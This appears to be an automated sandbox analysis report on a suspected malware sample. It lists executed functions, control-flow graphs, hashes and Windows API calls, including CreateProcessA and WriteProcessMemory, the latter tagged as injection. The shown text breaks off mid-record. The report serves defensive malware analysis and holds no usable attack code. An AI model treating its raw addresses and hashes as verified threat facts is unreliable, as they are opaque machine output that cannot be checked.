36637 719a78a DrawTextExW 36633->36637 36634 719a404 36634->36618 36635->36634 36636->36634 36637->36634 36641 719a7c8 DrawTextExW 36638->36641 36656 719a7d8 36638->36656 36639 719a7b6 36639->36628 36641->36639 36643 719a791 36642->36643 36644 719a7b6 36643->36644 36645 719a7d8 DrawTextExW 36643->36645 36646 719a7c8 DrawTextExW 36643->36646 36644->36628 36645->36644 36646->36644 36648 719a791 36647->36648 36650 719a7d6 36647->36650 36649 719a7b6 36648->36649 36652 719a7d8 DrawTextExW 36648->36652 36653 719a7c8 DrawTextExW 36648->36653 36649->36628 36651 719a836 36650->36651 36654 719a858 DrawTextExW 36650->36654 36655 719a848 DrawTextExW 36650->36655 36651->36628 36652->36649 36653->36649 36654->36651 36655->36651 36657 719a809 36656->36657 36658 719a836 36657->36658 36661 719a858 36657->36661 36666 719a848 36657->36666 36658->36639 36663 719a879 36661->36663 36662 719a88e 36662->36658 36663->36662 36671 7199c40 36663->36671 36665 719a8f9 36668 719a879 36666->36668 36667 719a88e 36667->36658 36668->36667 36669 7199c40 DrawTextExW 36668->36669 36670 719a8f9 36669->36670 36673 7199c4b 36671->36673 36672 719bea9 36672->36665 36673->36672 36675 719c978 DrawTextExW 36673->36675 36676 719c968 DrawTextExW 36673->36676 36674 719bfbc 36674->36665 36675->36674 36676->36674 36689 71929a8 36690 71929e2 36689->36690 36691 7192a5e 36690->36691 36692 7192a73 36690->36692 36697 71911fc 36691->36697 36694 71911fc 3 API calls 36692->36694 36696 7192a82 36694->36696 36698 7191207 36697->36698 36699 7192a69 36698->36699 36702 7193468 36698->36702 36707 7193457 36698->36707 36703 7193482 36702->36703 36712 7191254 36702->36712 36705 71934b6 CreateIconFromResourceEx 36703->36705 36706 719348f 36703->36706 36705->36706 36706->36699 36708 7191254 CreateIconFromResourceEx 36707->36708 36709 7193482 36708->36709 36710 71934b6 CreateIconFromResourceEx 36709->36710 36711 719348f 36709->36711 36710->36711 36711->36699 36713 71934b8 CreateIconFromResourceEx 36712->36713 36714 7193536 36713->36714 36714->36703 36528 2a5afb0 36529 2a5afbf 36528->36529 36532 2a5b0a3 36528->36532 36537 2a5b0a8 36528->36537 36533 2a5b0dc 36532->36533 36534 2a5b0b9 36532->36534 36533->36529 36534->36533 36535 2a5b2e0 GetModuleHandleW 36534->36535 36536 2a5b30d 36535->36536 36536->36529 36538 2a5b0dc 36537->36538 36539 2a5b0b9 36537->36539 36538->36529 36539->36538 36540 2a5b2e0 GetModuleHandleW 36539->36540 36541 2a5b30d 36540->36541 36541->36529 36677 2a5d340 36678 2a5d386 GetCurrentProcess 36677->36678 36680 2a5d3d8 GetCurrentThread 36678->36680 36683 2a5d3d1 36678->36683 36681 2a5d415 GetCurrentProcess 36680->36681 36682 2a5d40e 36680->36682 36684 2a5d44b 36681->36684 36682->36681 36683->36680 36685 2a5d473 GetCurrentThreadId 36684->36685 36686 2a5d4a4 36685->36686 36498 2a54668 36499 2a54672 36498->36499 36501 2a54763 36498->36501 36502 2a5477d 36501->36502 36506 2a5485f 36502->36506 36510 2a54868 36502->36510 36507 2a5488f 36506->36507 36508 2a5496c 36507->36508 36514 2a54514 36507->36514 36508->36508 36512 2a5488f 36510->36512 36511 2a5496c 36512->36511 36513 2a54514 CreateActCtxA 36512->36513 36513->36511 36515 2a558f8 CreateActCtxA 36514->36515 36517 2a559bb 36515->36517 36687 2a5d588 DuplicateHandle 36688 2a5d61e 36687->36688 36518 7660e68 36519 7660ff3 36518->36519 36520 7660e8e 36518->36520 36520->36519 36523 76610e1 36520->36523 36526 76610e8 PostMessageW 36520->36526 36524 76610e8 PostMessageW 36523->36524 36525 7661154 36524->36525 36525->36520 36527 7661154 36526->36527 36527->36520

                                                                  Executed Functions

                                                                  Function 071911FC Relevance: 6.9, Strings: 5, Instructions: 651COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 328 71911fc-7192ac8 331 7192fab-7193014 328->331 332 7192ace-7192ad3 328->332 339 719301b-71930a3 331->339 332->331 333 7192ad9-7192af6 332->333 333->339 340 7192afc-7192b00 333->340 386 71930ae-719312e 339->386 341 7192b0f-7192b13 340->341 342 7192b02-7192b0c call 719120c 340->342 343 7192b22-7192b29 341->343 344 7192b15-7192b1f call 719120c 341->344 342->341 349 7192b2f-7192b5f 343->349 350 7192c44-7192c49 343->350 344->343 360 719332e-71933ae 349->360 363 7192b65-7192c38 call 7191218 * 2 349->363 353 7192c4b-7192c4f 350->353 354 7192c51-7192c56 350->354 353->354 357 7192c58-7192c5c 353->357 358 7192c68-7192c98 call 7191224 * 3 354->358 357->360 361 7192c62-7192c65 357->361 358->386 387 7192c9e-7192ca1 358->387 376 71933b0-71933b6 360->376 377 71933b7-71933d4 360->377 361->358 363->350 394 7192c3a 363->394 376->377 402 7193135-71931b7 386->402 387->386 389 7192ca7-7192ca9 387->389 389->386 390 7192caf-7192ce4 389->390 401 7192cea-7192cf3 390->401 390->402 394->350 404 7192cf9-7192d53 call 7191224 * 2 call 7191234 * 2 401->404 405 7192e56-7192e5a 401->405 406 71931bf-7193241 402->406 451 7192d65 404->451 452 7192d55-7192d5e 404->452 405->406 407 7192e60-7192e64 405->407 411 7193249-7193276 406->411 407->411 412 7192e6a-7192e70 407->412 424 719327d-71932fd 411->424 416 7192e72 412->416 417 7192e74-7192ea9 412->417 421 7192eb0-7192eb6 416->421 417->421 421->424 425 7192ebc-7192ec4 421->425 481 7193304-7193326 424->481 429 7192ecb-7192ecd 425->429 430 7192ec6-7192eca 425->430 435 7192f2f-7192f35 429->435 436 7192ecf-7192ef3 429->436 430->429 441 7192f54-7192f82 435->441 442 7192f37-7192f52 435->442 469 7192efc-7192f00 436->469 470 7192ef5-7192efa 436->470 461 7192f8a-7192f96 441->461 442->461 453 7192d69-7192d6b 451->453 452->453 454 7192d60-7192d63 452->454 459 7192d6d 453->459 460 7192d72-7192d76 453->460 454->453 459->460 466 7192d78-7192d7f 460->466 467 7192d84-7192d8a 460->467 480 7192f9c-7192fa8 461->480 461->481 473 7192e21-7192e25 466->473 474 7192d8c-7192d92 467->474 475 7192d94-7192d99 467->475 469->360 478 7192f06-7192f09 469->478 477 7192f0c-7192f1d 470->477 482 7192e44-7192e50 473->482 483 7192e27-7192e41 473->483 484 7192d9f-7192da5 474->484 475->484 519 7192f1f call 7193468 477->519 520 7192f1f call 7193457 477->520 478->477 481->360 482->404 482->405 483->482 488 7192dab-7192db0 484->488 489 7192da7-7192da9 484->489 495 7192db2-7192dc4 488->495 489->495 492 7192f25-7192f2d 492->461 497 7192dce-7192dd3 495->497 498 7192dc6-7192dcc 495->498 502 7192dd9-7192de0 497->502 498->502 506 7192de2-7192de4 502->506 507 7192de6 502->507 510 7192deb-7192df6 506->510 507->510 511 7192df8-7192dfb 510->511 512 7192e1a 510->512 511->473 514 7192dfd-7192e03 511->514 512->473 515 7192e0a-7192e13 514->515 516 7192e05-7192e08 514->516 515->473 518 7192e15-7192e18 515->518 516->512 516->515 518->473 518->512 519->492 520->492
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451271228.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7190000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Hq$Hq$Hq$Hq$Hq
                                                                  • API String ID: 0-3799487529
                                                                  • Opcode ID: 0ff48a8c9407b274209b7744e499f7051b8ac5d073eb9c3af4ca0a77823feb42
                                                                  • Instruction ID: cc29d70c5dd52879e9b828a95e5097da54c1c6d280f48a27305267d8ef8bda11
                                                                  • Opcode Fuzzy Hash: 0ff48a8c9407b274209b7744e499f7051b8ac5d073eb9c3af4ca0a77823feb42
                                                                  • Instruction Fuzzy Hash: 81427DB1E002189FDF55DFA9D89079EBBF2BF84300F14816AD40AAB395DB349D46CB91
                                                                  Function 07198930 Relevance: .5, Instructions: 520COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451271228.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7190000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4bbc9fafd07ac7415c2cdcd1fc22ad5969dd1af20261eb36a4ccc4bb92f360bb
                                                                  • Instruction ID: c1a86fa039be94bd56bfd014b3a3545944b55fc89fd6a6841ac864065a77035c
                                                                  • Opcode Fuzzy Hash: 4bbc9fafd07ac7415c2cdcd1fc22ad5969dd1af20261eb36a4ccc4bb92f360bb
                                                                  • Instruction Fuzzy Hash: FB224B71A10219CFCF24DF68D884AADB7B2FF85310F1585A5E809AB255EB30ED86CF51
                                                                  Function 07661530 Relevance: .3, Instructions: 341COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451956524.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7660000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: eaed54c1682800367d18dd8beb7c0240e3a96a977da2d0f618b3487e36fcade5
                                                                  • Instruction ID: cfbfdaa55d1749b78ddb5872977543d94abacc64ac16b0eb8c154a6828c43e8c
                                                                  • Opcode Fuzzy Hash: eaed54c1682800367d18dd8beb7c0240e3a96a977da2d0f618b3487e36fcade5
                                                                  • Instruction Fuzzy Hash: C6C197B1B007098FDB29EB76C454B6EB7EAAF8A700F94456DD0468B391CF34E902CB51
                                                                  Function 07192A90 Relevance: .3, Instructions: 285COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451271228.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7190000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 140afcd145b58d2cef58d3ba2df25913b82876ed874498816283dc8419baafae
                                                                  • Instruction ID: 980684ceb2f110493b87aaea2697660f137cffa30b79edc86ba69053ea61558f
                                                                  • Opcode Fuzzy Hash: 140afcd145b58d2cef58d3ba2df25913b82876ed874498816283dc8419baafae
                                                                  • Instruction Fuzzy Hash: 0BC14BB1E00259DFDF25DFA5D880799BBF2BF88310F1485AAD409AB295DB30D986CF50
                                                                  Function 07188C58 Relevance: .1, Instructions: 66COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451208286.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7180000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 807f3e7f1a89091e74223d1387418fcc3b76ba30c00e90738eaad03185759b37
                                                                  • Instruction ID: c2fbba16043dbe08441cd123a60e8fbcd545fe57fd113f0c95bb34cd916bc9c6
                                                                  • Opcode Fuzzy Hash: 807f3e7f1a89091e74223d1387418fcc3b76ba30c00e90738eaad03185759b37
                                                                  • Instruction Fuzzy Hash: 1B2137B1D146188BEB18CFA7C8047EEFBF6AFC9300F15C16AC409A62A5DB3406458F90
                                                                  Function 07188C68 Relevance: .1, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451208286.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7180000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 13dc88639952f19d067353212fe057b1169389e1bf188fb67cbff94d281da72f
                                                                  • Instruction ID: 4eee167c79c28e1a4099ca7a415249c2d52a74ee6b3cb68cba5fa039e3f37abe
                                                                  • Opcode Fuzzy Hash: 13dc88639952f19d067353212fe057b1169389e1bf188fb67cbff94d281da72f
                                                                  • Instruction Fuzzy Hash: C0211AB1D146198BEB18DF67C8047EEFAF7AFC9300F14C17A8419A6294DB7405458E90
                                                                  Function 02A5D330 Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 569 2a5d330-2a5d3cf GetCurrentProcess 573 2a5d3d1-2a5d3d7 569->573 574 2a5d3d8-2a5d40c GetCurrentThread 569->574 573->574 575 2a5d415-2a5d449 GetCurrentProcess 574->575 576 2a5d40e-2a5d414 574->576 578 2a5d452-2a5d46d call 2a5d50f 575->578 579 2a5d44b-2a5d451 575->579 576->575 582 2a5d473-2a5d4a2 GetCurrentThreadId 578->582 579->578 583 2a5d4a4-2a5d4aa 582->583 584 2a5d4ab-2a5d50d 582->584 583->584
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 02A5D3BE
                                                                  • GetCurrentThread.KERNEL32 ref: 02A5D3FB
                                                                  • GetCurrentProcess.KERNEL32 ref: 02A5D438
                                                                  • GetCurrentThreadId.KERNEL32 ref: 02A5D491
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1447061842.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2a50000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ProcessThread
                                                                  • String ID:
                                                                  • API String ID: 2063062207-0
                                                                  • Opcode ID: 8d4e975c8e78c866e5740add06f83ab4da9666d15cd3ea2b2ef1a08c8773e470
                                                                  • Instruction ID: 6403c12b67042c16e6b5e9009dcba548737d52856f099d39cfd7b3909c691582
                                                                  • Opcode Fuzzy Hash: 8d4e975c8e78c866e5740add06f83ab4da9666d15cd3ea2b2ef1a08c8773e470
                                                                  • Instruction Fuzzy Hash: 205188B0900749CFDB18CFA9D588BDEBBF1EF48304F248859E409AB390DB356844CB25
                                                                  Function 02A5D340 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 591 2a5d340-2a5d3cf GetCurrentProcess 595 2a5d3d1-2a5d3d7 591->595 596 2a5d3d8-2a5d40c GetCurrentThread 591->596 595->596 597 2a5d415-2a5d449 GetCurrentProcess 596->597 598 2a5d40e-2a5d414 596->598 600 2a5d452-2a5d46d call 2a5d50f 597->600 601 2a5d44b-2a5d451 597->601 598->597 604 2a5d473-2a5d4a2 GetCurrentThreadId 600->604 601->600 605 2a5d4a4-2a5d4aa 604->605 606 2a5d4ab-2a5d50d 604->606 605->606
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 02A5D3BE
                                                                  • GetCurrentThread.KERNEL32 ref: 02A5D3FB
                                                                  • GetCurrentProcess.KERNEL32 ref: 02A5D438
                                                                  • GetCurrentThreadId.KERNEL32 ref: 02A5D491
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1447061842.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2a50000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ProcessThread
                                                                  • String ID:
                                                                  • API String ID: 2063062207-0
                                                                  • Opcode ID: 5e3c76d456b7e995812267a73534ac4a0f974b102c5ab27169d78af4511db692
                                                                  • Instruction ID: f1830a99c3eb0db5b62d19730159a6c63bf737355d99b8ae1ea4324762f1d322
                                                                  • Opcode Fuzzy Hash: 5e3c76d456b7e995812267a73534ac4a0f974b102c5ab27169d78af4511db692
                                                                  • Instruction Fuzzy Hash: BD5168B09007498FDB14CFAAD588BDEBBF1EF48304F208859E419A7350DB756844CB65
                                                                  Function 0718E880 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 770 718e880-718e915 772 718e94e-718e96e 770->772 773 718e917-718e921 770->773 778 718e970-718e97a 772->778 779 718e9a7-718e9d6 772->779 773->772 774 718e923-718e925 773->774 776 718e948-718e94b 774->776 777 718e927-718e931 774->777 776->772 780 718e933 777->780 781 718e935-718e944 777->781 778->779 783 718e97c-718e97e 778->783 787 718e9d8-718e9e2 779->787 788 718ea0f-718eac9 CreateProcessA 779->788 780->781 781->781 782 718e946 781->782 782->776 784 718e980-718e98a 783->784 785 718e9a1-718e9a4 783->785 789 718e98c 784->789 790 718e98e-718e99d 784->790 785->779 787->788 791 718e9e4-718e9e6 787->791 801 718eacb-718ead1 788->801 802 718ead2-718eb58 788->802 789->790 790->790 792 718e99f 790->792 793 718e9e8-718e9f2 791->793 794 718ea09-718ea0c 791->794 792->785 796 718e9f4 793->796 797 718e9f6-718ea05 793->797 794->788 796->797 797->797 798 718ea07 797->798 798->794 801->802 812 718eb68-718eb6c 802->812 813 718eb5a-718eb5e 802->813 815 718eb7c-718eb80 812->815 816 718eb6e-718eb72 812->816 813->812 814 718eb60 813->814 814->812 818 718eb90-718eb94 815->818 819 718eb82-718eb86 815->819 816->815 817 718eb74 816->817 817->815 821 718eba6-718ebad 818->821 822 718eb96-718eb9c 818->822 819->818 820 718eb88 819->820 820->818 823 718ebaf-718ebbe 821->823 824 718ebc4 821->824 822->821 823->824
                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0718EAB6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451208286.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7180000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: af79914aa0cb4fa146a5d903223b628b63f7e372c055a9b1192e8374a864b206
                                                                  • Instruction ID: 6292630c8bd1beecc2e4dde6b82525fe9d9325a5368bb74ca9a57378a3109429
                                                                  • Opcode Fuzzy Hash: af79914aa0cb4fa146a5d903223b628b63f7e372c055a9b1192e8374a864b206
                                                                  • Instruction Fuzzy Hash: E7916BB1D00319CFEF65DF68C841BADBBB2BF48310F048169E809A7290DB759989CF91
                                                                  Function 02A5B0A8 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 826 2a5b0a8-2a5b0b7 827 2a5b0e3-2a5b0e7 826->827 828 2a5b0b9-2a5b0c6 call 2a5ad38 826->828 830 2a5b0e9-2a5b0f3 827->830 831 2a5b0fb-2a5b13c 827->831 834 2a5b0dc 828->834 835 2a5b0c8 828->835 830->831 837 2a5b13e-2a5b146 831->837 838 2a5b149-2a5b157 831->838 834->827 881 2a5b0ce call 2a5b340 835->881 882 2a5b0ce call 2a5b33b 835->882 837->838 839 2a5b159-2a5b15e 838->839 840 2a5b17b-2a5b17d 838->840 843 2a5b160-2a5b167 call 2a5ad44 839->843 844 2a5b169 839->844 842 2a5b180-2a5b187 840->842 841 2a5b0d4-2a5b0d6 841->834 845 2a5b218-2a5b2d8 841->845 848 2a5b194-2a5b19b 842->848 849 2a5b189-2a5b191 842->849 846 2a5b16b-2a5b179 843->846 844->846 876 2a5b2e0-2a5b30b GetModuleHandleW 845->876 877 2a5b2da-2a5b2dd 845->877 846->842 852 2a5b19d-2a5b1a5 848->852 853 2a5b1a8-2a5b1b1 call 2a5ad54 848->853 849->848 852->853 857 2a5b1b3-2a5b1bb 853->857 858 2a5b1be-2a5b1c3 853->858 857->858 859 2a5b1c5-2a5b1cc 858->859 860 2a5b1e1-2a5b1ee 858->860 859->860 862 2a5b1ce-2a5b1de call 2a5ad64 call 2a5ad74 859->862 867 2a5b211-2a5b217 860->867 868 2a5b1f0-2a5b20e 860->868 862->860 868->867 878 2a5b314-2a5b328 876->878 879 2a5b30d-2a5b313 876->879 877->876 879->878 881->841 882->841
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 02A5B2FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1447061842.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2a50000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: abc85fcd70fb0186f3599b1f9ffa34c023055b87c60cb605e3bad761e4cc29b0
                                                                  • Instruction ID: 7a2b0ba6b96e8d83452bfa725bba10d3bd8c005479d52f3db1273a26e10734a4
                                                                  • Opcode Fuzzy Hash: abc85fcd70fb0186f3599b1f9ffa34c023055b87c60cb605e3bad761e4cc29b0
                                                                  • Instruction Fuzzy Hash: 13712670A00B158FD764DF2AD58075BBBF1FF88209F008A2DD486D7A54DB75E849CBA1
                                                                  Function 02A54514 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 883 2a54514-2a559b9 CreateActCtxA 886 2a559c2-2a55a1c 883->886 887 2a559bb-2a559c1 883->887 894 2a55a1e-2a55a21 886->894 895 2a55a2b-2a55a2f 886->895 887->886 894->895 896 2a55a31-2a55a3d 895->896 897 2a55a40 895->897 896->897 899 2a55a41 897->899 899->899
                                                                  APIs
                                                                  • CreateActCtxA.KERNEL32(?), ref: 02A559A9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1447061842.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2a50000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: Create
                                                                  • String ID:
                                                                  • API String ID: 2289755597-0
                                                                  • Opcode ID: 81398389a9e2f68d3b6ee35a3022e4f13fbfefe139d499f29960c237b92f69b8
                                                                  • Instruction ID: 7b1c2f89a686032cfa59e1566d5dc866a25b383ecc7f72872ae227651f49b9c2
                                                                  • Opcode Fuzzy Hash: 81398389a9e2f68d3b6ee35a3022e4f13fbfefe139d499f29960c237b92f69b8
                                                                  • Instruction Fuzzy Hash: 2041E370D00729DFEB24DFA9C884B9EBBF5BF49304F20806AE409AB251DB756949CF54
                                                                  Function 02A558F7 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 900 2a558f7-2a559b9 CreateActCtxA 902 2a559c2-2a55a1c 900->902 903 2a559bb-2a559c1 900->903 910 2a55a1e-2a55a21 902->910 911 2a55a2b-2a55a2f 902->911 903->902 910->911 912 2a55a31-2a55a3d 911->912 913 2a55a40 911->913 912->913 915 2a55a41 913->915 915->915
                                                                  APIs
                                                                  • CreateActCtxA.KERNEL32(?), ref: 02A559A9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1447061842.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2a50000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: Create
                                                                  • String ID:
                                                                  • API String ID: 2289755597-0
                                                                  • Opcode ID: ee79479bdfa121f24f60cd0ae0a2030a6125e387bab3a4328527adc0e46cf00e
                                                                  • Instruction ID: 31cd5c3aedf189a75619b9883b073400cee54dcbb19e9804ab6cda462ba1ac6d
                                                                  • Opcode Fuzzy Hash: ee79479bdfa121f24f60cd0ae0a2030a6125e387bab3a4328527adc0e46cf00e
                                                                  • Instruction Fuzzy Hash: 2541C170D00729CFEB24CFA9C884BDEBBB5BF49304F20806AD409AB251DB75694ACF54
                                                                  Function 07193468 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 916 7193468-719347a 917 7193482-719348d 916->917 918 719347d call 7191254 916->918 919 719348f-719349f 917->919 920 71934a2-71934b4 917->920 918->917 923 7193528-7193534 920->923 924 71934b6-7193527 CreateIconFromResourceEx 920->924 925 719353d-719355a 923->925 926 7193536-719353c 923->926 924->923 926->925
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451271228.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7190000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFromIconResource
                                                                  • String ID:
                                                                  • API String ID: 3668623891-0
                                                                  • Opcode ID: 2b781dd5c189a7ba940eb475cc0bcb3cb2d3c5d0303d5f5b46388f586a6f2342
                                                                  • Instruction ID: 1affccb2f0776dd31692a8edc51848508ec1e554b87c7294520cdabeb6b8433a
                                                                  • Opcode Fuzzy Hash: 2b781dd5c189a7ba940eb475cc0bcb3cb2d3c5d0303d5f5b46388f586a6f2342
                                                                  • Instruction Fuzzy Hash: E7319CB6900349EFDF12CFA9D840ADABFF8EF08310F14845AF954AB251C3359951DBA1
                                                                  Function 0719B4B4 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 929 719b4b4-719c9fc 931 719c9fe-719ca04 929->931 932 719ca07-719ca16 929->932 931->932 933 719ca18 932->933 934 719ca1b-719ca54 DrawTextExW 932->934 933->934 935 719ca5d-719ca7a 934->935 936 719ca56-719ca5c 934->936 936->935
                                                                  APIs
                                                                  • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0719C995,?,?), ref: 0719CA47
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451271228.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7190000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: DrawText
                                                                  • String ID:
                                                                  • API String ID: 2175133113-0
                                                                  • Opcode ID: ec6e8dd628154c1557f8087cc509ccc9aed23debbd8870da683ee28b3612c7bc
                                                                  • Instruction ID: 65e2b2faa5ba349ea105aec08d7f9cdbc0f05caad3f695440656bba4e425903b
                                                                  • Opcode Fuzzy Hash: ec6e8dd628154c1557f8087cc509ccc9aed23debbd8870da683ee28b3612c7bc
                                                                  • Instruction Fuzzy Hash: 3531E2B5D003499FDB10CFAAD880A9EFBF4FB48260F14842AE959A7250D775A941CFA0
                                                                  Function 0719C9A8 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0719C995,?,?), ref: 0719CA47
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451271228.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7190000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: DrawText
                                                                  • String ID:
                                                                  • API String ID: 2175133113-0
                                                                  • Opcode ID: e4f7f5908c2a41ab85ca4e938c70103fc2914063a626b3613bcd6af0333d5ac4
                                                                  • Instruction ID: 340bf43ec40eef715ced36b5ae66979964fb084c74a3d25d0657adebea5d8686
                                                                  • Opcode Fuzzy Hash: e4f7f5908c2a41ab85ca4e938c70103fc2914063a626b3613bcd6af0333d5ac4
                                                                  • Instruction Fuzzy Hash: 8231E2B5D00349AFDB11CFAAD880ADEFBF5FB48250F14842AE859A7750D375A941CFA0
                                                                  Function 0718E5F8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0718E688
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451208286.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7180000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: d34981d6c61796e24e6239b2d4624bbb7f25cb6e50f0c028918e0ea321d2aabd
